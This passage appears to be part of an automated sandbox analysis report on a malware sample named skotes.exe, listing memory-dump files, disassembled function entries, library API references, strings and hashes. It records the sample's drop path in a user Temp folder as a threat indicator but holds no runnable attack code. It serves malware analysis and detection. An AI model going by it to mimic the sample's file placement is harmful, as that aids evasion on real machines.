Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: cd07f172115fcf458688144da2965de77882c86772451437fdf24d97fb892235
Instruction ID: 839437c0312a15950587b5f4abd6a32925ef3438273789b2e0cf48d2253ba555
Opcode Fuzzy Hash: cd07f172115fcf458688144da2965de77882c86772451437fdf24d97fb892235
Instruction Fuzzy Hash: 1F3145329012559FCF14EFA9C9816EDBBB1BF06318B2400BFD80167652CB39A904CB99

Function 004A182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A18A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004A18EB

Strings

pContext, xrefs: 004A189C

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 85db0178acf7c46d9ac776483770fa38a4a46d757023282b8b4eb151991369a1
Instruction ID: a967e54dcae7a4dc7eb7dbd70a27208a26a4b2493dd9e5fc6db1d033dd95c273
Opcode Fuzzy Hash: 85db0178acf7c46d9ac776483770fa38a4a46d757023282b8b4eb151991369a1
Instruction Fuzzy Hash: 7321E735B006159BCB14BB69D895ABD73A5BFA6328F04012FE511873E1CB6CEC418A99

Function 004ADFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 004ADFE8
6J, xrefs: 004AE034

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 6J$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-2710734762
Opcode ID: fc5f7313780df18aa499d9b71f8cfae6071f00e52407e2036743a1c9d9e95679
Instruction ID: ced02e7f487a097450160dbe391ac93162f6601a95fd1d12cf4afa15d2d234ce
Opcode Fuzzy Hash: fc5f7313780df18aa499d9b71f8cfae6071f00e52407e2036743a1c9d9e95679
Instruction Fuzzy Hash: 0321C8716082197F9B306F778C40E6B77DDEF22368B10451AF93897642E778EC005669

Function 0049AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0049AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0049AF4E

Strings

pExecutionResource, xrefs: 0049AF07

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 0f2af76741249781cff76c4b92cb239beca7d7c7e276f486b376cb1eccdde5ee
Instruction ID: 7f9829f7792e40a20a017bc661a964dc8fdca7dc6e6259b2db1f3ca8267e0b40
Opcode Fuzzy Hash: 0f2af76741249781cff76c4b92cb239beca7d7c7e276f486b376cb1eccdde5ee
Instruction Fuzzy Hash: 2021C575A412049BCF04FF59C852BAD77A5BF88304F10442FE501A7382DBB8AE148B99

Function 00494EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00494F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00494F66

Strings

count, xrefs: 00494EBA
ppVirtualProcessorRoots, xrefs: 00494F1C

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: caee4f224213664f8514ef7367c017090adc2c9c35ed6b34b8f59fc590f58c2c
Instruction ID: 16eff3212538d5e5335428b7a0f73093740b37a900a38585b684b9a5aa438f3f
Opcode Fuzzy Hash: caee4f224213664f8514ef7367c017090adc2c9c35ed6b34b8f59fc590f58c2c
Instruction Fuzzy Hash: D921E234A00105EFCF04EF99C891EAD7BA1BF49304F10406FE50597691CB79AA02CB59

Function 0049B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0049BA0E

Strings

RoUninitialize, xrefs: 0049B9C1
RoInitialize, xrefs: 0049B998
combase.dll, xrefs: 0049B983, 0049B988, 0049B99D, 0049B9C8

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
